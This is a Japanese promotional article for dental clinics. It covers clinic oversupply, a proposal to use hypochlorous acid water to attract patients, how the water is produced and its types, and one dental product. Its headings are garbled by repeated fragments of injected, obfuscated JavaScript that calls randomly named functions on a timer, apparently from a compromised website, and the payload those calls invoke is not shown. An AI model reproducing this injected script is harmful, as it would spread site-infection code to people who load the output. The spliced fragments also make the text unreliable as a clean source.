歯科医院様向け 「次亜塩素酸水の歯科利用」についてandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

❒歯科業界の現状andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

よく言われていることですが、歯科医院の数はコンビニの件数より多い。実際に、コンビニ店数54、413件(平成28年度調査)歯科医院数 68、756件(厚労省、医療施設調べ)と歯科医院の数が多くなっています。しかもこの数は年々増加傾向にあり、毎年1500人のペースで歯科医師が誕生しています。特に都心部では、10万人当たりの医院数が過疎地に対して2倍近く開院しており廃院する医院も多いのが現状です。

もともと歯科医療は、地域密着型の医療サービスで、あまり遠方からの来院は期待できません。人口の減少による受診患者の減少、保険点数の引き下げ、歯科医院数の増加、当然過当競争が生まれます。いかに集患を成功させるのか、いかに既存患者を取り込むのかが生き残る「鍵」になっていますが、その答えを見出すのは容易ではありません。

そこで今回私が提案させていただくのが、次亜塩素酸水を使った集患、増患です。

❒まず最初にお伝えしなければいけないこと。

次亜塩素酸水の歯科利用については賛否両論があり、現時点で歯科治療への使用に対しては、事前に十分な情報提供を行い、患者さんの同意を得たうえで歯科医師の責任の下に行うことが必要です。

❒次亜塩素酸水の作り方と種類andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

作り方は、主に3通り

・電気分解方式・・・溶剤が食塩水、希塩酸、食塩水+希塩酸の3種類あり、また電気分解に使う電解槽が、隔膜がある有隔膜槽と無隔膜槽があります。

・二液混合方式・・・次亜塩素酸ナトリウムと塩酸やクエン酸を混ぜ合わせる方法。

・ジククロロイソシアヌル酸ナトリウム・・・粉末のジクロロイソシアヌル酸ナトリウムを水で溶いて作る方法。プールの殺菌消毒などに使われます。

次亜塩素酸水の種類

名称 電解槽 被電解液 pH 有効塩素濃度(ppm)
強酸性次亜塩素酸水   二室型/三室型   NaCl水 2.7以下* 20~60
弱酸性次亜塩素酸水   二室型/三室型    NaCl水 2.7~5.0 10~60
微酸性次亜塩素酸水 一室型 塩酸水 5.0~6.5 10~30
塩酸/NaCl水 5.0~6.5 50~80
電解次亜水 一室型 NaCl水 7.5~10 50~200

 

*強酸性次亜塩素酸水のpHは実際的には2.2~2.7である。pH2.2以下では塩素ガスの発生が激しくなる。

参照wikipedia

❒歯科では、どんな次亜塩素酸水を使っている?andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

・パーフェクトぺリオ・・・ PH7~8、濃度200~300ppm、全国303歯科医院で利用(HP)